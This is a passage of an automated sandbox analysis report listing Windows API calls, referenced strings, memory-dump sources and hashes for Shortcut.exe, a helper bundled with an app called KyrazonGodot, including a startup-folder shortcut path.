                                                                                      • MultiByteToWideChar.KERNEL32(?,00000002,00000000,00200020,00000000,00000000,00000103,00000001,?,?,00405CFC,00200020,00000000,?,?,00000000), ref: 00403F6C
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00405CFC,00200020,00000000), ref: 00403FC4
                                                                                      • LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,00405CFC,00200020,00000000), ref: 00403FDA
                                                                                      • LCMapStringW.KERNEL32(?,?,00405CFC,00000000,00405CFC,?,?,00405CFC,00200020,00000000), ref: 0040400D
                                                                                      • LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,00405CFC,00200020,00000000), ref: 00404075
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: String$ByteCharMultiWide
                                                                                      • String ID:

                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00404E1E
                                                                                      • GetStdHandle.KERNEL32(000000F4,004084A4,00000000,?,00000000,00000000), ref: 00404EF4
                                                                                      • WriteFile.KERNEL32(00000000), ref: 00404EFB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$HandleModuleNameWrite
                                                                                      • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:

                                                                                      APIs
                                                                                      • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk,00000000,002A6465), ref: 00401C63
                                                                                      • FormatMessageA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk,00000000,002A6465), ref: 00401C8B
                                                                                      • LocalFree.KERNEL32(?), ref: 00401CD1
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00401CDC
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk, xrefs: 00401C2D
                                                                                      • netmsg.dll, xrefs: 00401C5E
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeLibrary$FormatLoadLocalMessage
                                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk$netmsg.dll
                                                                                      APIs
                                                                                      • GetStringTypeW.KERNEL32(00000001,004081F4,00000001,?,00000103,00000001,?,00405CFC,00200020,00000000,?,?,00000000,00000001), ref: 00404F43
                                                                                      • GetStringTypeA.KERNEL32(00000000,00000001,004081F0,00000001,?,?,?,00000000,00000001), ref: 00404F5D
                                                                                      • GetStringTypeA.KERNEL32(?,?,?,00000000,00200020,00000103,00000001,?,00405CFC,00200020,00000000,?,?,00000000,00000001), ref: 00404F91
                                                                                      • MultiByteToWideChar.KERNEL32(00405CFC,00000002,?,00000000,00000000,00000000,00000103,00000001,?,00405CFC,00200020,00000000,?,?,00000000,00000001), ref: 00404FC9
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?), ref: 0040501F
                                                                                      • GetStringTypeW.KERNEL32(?,?,00000000,?,?,?), ref: 00405031
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: StringType$ByteCharMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 3852931651-0
                                                                                      • Opcode ID: 10c2dd83d6c4891f4b19a69c398e9b50d9e8c1fd6f195fed43029adedc618a4a
                                                                                      • Instruction ID: e8077265912694feb20199444432bd54d64186ba5fb9de02ee2b6094005642b9
                                                                                      • Opcode Fuzzy Hash: 10c2dd83d6c4891f4b19a69c398e9b50d9e8c1fd6f195fed43029adedc618a4a
                                                                                      • Instruction Fuzzy Hash: 4D416EB190061AAFCF209F94DD85EAF7BB8EB04754F10443AFA15B2290D73889559BE8
                                                                                      APIs
                                                                                      • GetVersionExA.KERNEL32 ref: 00404A21
                                                                                      • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00404A56
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00404AB6
                                                                                      Similarity
                                                                                      • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                      • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                      • API String ID: 1385375860-4131005785
                                                                                      • Opcode ID: c2e46501cb34ff5ec822bfb9ec5beae3fa957931afad9139806d236dc87c07b5
                                                                                      • Instruction ID: bd575d6e86409f67b89e6321b2ac6b3d904a07d1e09031c5d33df5c7808616b4
                                                                                      • Opcode Fuzzy Hash: c2e46501cb34ff5ec822bfb9ec5beae3fa957931afad9139806d236dc87c07b5
                                                                                      • Instruction Fuzzy Hash: 5931C3F1A8124869EB3196705C45B9B37689B86304F2404FFD385F62C2E678DA89CF1D
                                                                                      APIs
                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 00404883
                                                                                      • GetFileType.KERNEL32(00000800), ref: 00404929
                                                                                      • GetStdHandle.KERNEL32(-000000F6), ref: 00404982
                                                                                      • GetFileType.KERNEL32(00000000), ref: 00404990
                                                                                      • SetHandleCount.KERNEL32 ref: 004049C7
                                                                                      Similarity
                                                                                      • API ID: FileHandleType$CountInfoStartup
                                                                                      • String ID:
                                                                                      • API String ID: 1710529072-0
                                                                                      • Opcode ID: 185b7c6d422e415d3ebbcbce5bc206f78151db82d189772629bd0f1d3015a871
                                                                                      • Instruction ID: fc641859bd4fd339b69d41a431ef02c5b98227dccaa49943cb6363da23072a57
                                                                                      • Opcode Fuzzy Hash: 185b7c6d422e415d3ebbcbce5bc206f78151db82d189772629bd0f1d3015a871
                                                                                      • Instruction Fuzzy Hash: DE5126F29042418BD7219B38CA44B673B90EB91320F15477EEAE6FB3E1D738D8498759
                                                                                      APIs
                                                                                      • HeapAlloc.KERNEL32(00000000,00002020,?,?,?,?,00404B90), ref: 004067DA
                                                                                      • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,?,?,00404B90), ref: 004067FE
                                                                                      • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,?,?,00404B90), ref: 00406818
                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,00404B90), ref: 004068D9
                                                                                      • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00404B90), ref: 004068F0
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual$FreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 714016831-0
                                                                                      • Opcode ID: 3ea6627101bb3f8d28e1942db286dffea8f3837542d8e6896e24ece2c93cb393
                                                                                      • Instruction ID: acd04c8510f0ef6fb46427d060ff61076c05d727fdb6601c2505802ebc05d4dd
                                                                                      • Opcode Fuzzy Hash: 3ea6627101bb3f8d28e1942db286dffea8f3837542d8e6896e24ece2c93cb393
                                                                                      • Instruction Fuzzy Hash: 093107719017019BD3309F24DD44B22B7A0EB44754F12813EE996B77D0EB78A828974E
                                                                                      APIs
                                                                                      • VirtualFree.KERNEL32(?,00008000,00004000,74DEDFF0,?,00000000), ref: 00406233
                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0040628E
                                                                                      • HeapFree.KERNEL32(00000000,?), ref: 004062A0
                                                                                      Similarity
                                                                                      • API ID: Free$Virtual$Heap
                                                                                      • String ID: -@
                                                                                      • API String ID: 2016334554-2999422947
                                                                                      • Opcode ID: 7d61b6457e1237e3b9ff3d33e82737f19d6c99c2ed17d01c58d2f458cb4ceb82
                                                                                      • Instruction ID: 8d112c40a7e32810c9b14bef7942e7ca57f7158f26a784d4f7749efd28daf399
                                                                                      • Opcode Fuzzy Hash: 7d61b6457e1237e3b9ff3d33e82737f19d6c99c2ed17d01c58d2f458cb4ceb82
                                                                                      • Instruction Fuzzy Hash: 57B17C34A002059FDB14CF48CAD0A69B7B2FB58314F25C1AED85A6F392CB36ED55CB84
                                                                                      APIs
                                                                                      • WriteFile.KERNEL32(?,?,?,00000000,00000000,00000001,00000000,?), ref: 00407112
                                                                                      Similarity
                                                                                      • API ID: FileWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3934441357-0
                                                                                      • Opcode ID: e09dc6fc6b4ea51e5cc7bed2f8298a0d2f54f69a7693411809a079bfa261a28d
                                                                                      • Instruction ID: fa558dee1c5888d74b13012bc73fa547acbbdb4bd3aac0d6447206d0587834ea
                                                                                      • Opcode Fuzzy Hash: e09dc6fc6b4ea51e5cc7bed2f8298a0d2f54f69a7693411809a079bfa261a28d
                                                                                      • Instruction Fuzzy Hash: D451C030E04208EFCB11CF68CD84A9E7BB5BF44340F20867AE815AB3D1D734AA45DB5A
                                                                                      APIs
                                                                                      • GetCPInfo.KERNEL32(00000000,?,?,?,00000000,?,?,00402DF9), ref: 00402EDB
                                                                                      Similarity
                                                                                      • API ID: Info
                                                                                      • String ID: p@$p@
                                                                                      • API String ID: 1807457897-3476017769
                                                                                      • Opcode ID: 9c87afb81c43f763c10419f2450c277547e313204eabffc705f0cef67c751ea7
                                                                                      • Instruction ID: 3914f9005d033d98c17e43e3033144e2b41ad2eaa203b51ef0bd9b96ee6c7522
                                                                                      • Opcode Fuzzy Hash: 9c87afb81c43f763c10419f2450c277547e313204eabffc705f0cef67c751ea7
                                                                                      • Instruction Fuzzy Hash: AF419C308092529EE700CF35CA4876A7FE9AB05344F24087FD985B72D2C77D4A56E74D
                                                                                      APIs
                                                                                      • GetCPInfo.KERNEL32(?,00000000), ref: 004030E6
                                                                                      Similarity
                                                                                      • API ID: Info
                                                                                      • String ID: $
                                                                                      • API String ID: 1807457897-3032137957
                                                                                      • Opcode ID: 193a9108bf2fae721e54ffea3e769f283794f08f71930f22d67e2580e0bc7997
                                                                                      • Instruction ID: d8e3abf327adfc85c33f230852f3636ca1b15aa8834cc25d044d70c47297e251
                                                                                      • Opcode Fuzzy Hash: 193a9108bf2fae721e54ffea3e769f283794f08f71930f22d67e2580e0bc7997
                                                                                      • Instruction Fuzzy Hash: 4D415A310042986AEB119F25CE49FEB3F9C9B06701F1408FAD985FB1D2C2394B59D76A
                                                                                      APIs
                                                                                      • GetVersion.KERNEL32 ref: 00402D91
                                                                                        • Part of subcall function 00404B4A: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402DC9,00000000), ref: 00404B5B
                                                                                        • Part of subcall function 00404B4A: HeapDestroy.KERNEL32 ref: 00404B9A
                                                                                      • GetCommandLineA.KERNEL32 ref: 00402DDF
                                                                                        • Part of subcall function 00402E6F: ExitProcess.KERNEL32 ref: 00402E8C
                                                                                      Similarity
                                                                                      • API ID: Heap$CommandCreateDestroyExitLineProcessVersion
                                                                                      • String ID: H*~
                                                                                      • API String ID: 1387771204-1495176569
                                                                                      • Opcode ID: c7a0977b9349a1d30c01abd58d83def3c08bb262b80e4292ab6daf9e85b70786
                                                                                      • Instruction ID: 02eb877745b522f99b33b0b935d98505204d0ac594d2280056544b862e450dca
                                                                                      • Opcode Fuzzy Hash: c7a0977b9349a1d30c01abd58d83def3c08bb262b80e4292ab6daf9e85b70786
                                                                                      • Instruction Fuzzy Hash: AC112EF1940601DFDB08AF66EE46B297765EB84758F10023EF605B72E1DB3D54408B69
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe,00000104,?,?,?,?,?,?,00402DF9), ref: 004044CE
                                                                                      Strings
                                                                                      • H*~, xrefs: 004044D4
                                                                                      • C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe, xrefs: 004044C2, 004044CC, 004044F1, 00404527
                                                                                      Similarity
                                                                                      • API ID: FileModuleName
                                                                                      • String ID: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe$H*~
                                                                                      • API String ID: 514040917-3565149328
                                                                                      APIs
                                                                                      • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,004063D5,?,?,?,00000100), ref: 00406635
                                                                                      • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,004063D5,?,?,?,00000100), ref: 00406669
                                                                                      • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,004063D5,?,?,?,00000100), ref: 00406683
                                                                                      • HeapFree.KERNEL32(00000000,?,?,00000000,004063D5,?,?,?,00000100), ref: 0040669A
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocHeap$FreeVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 3499195154-0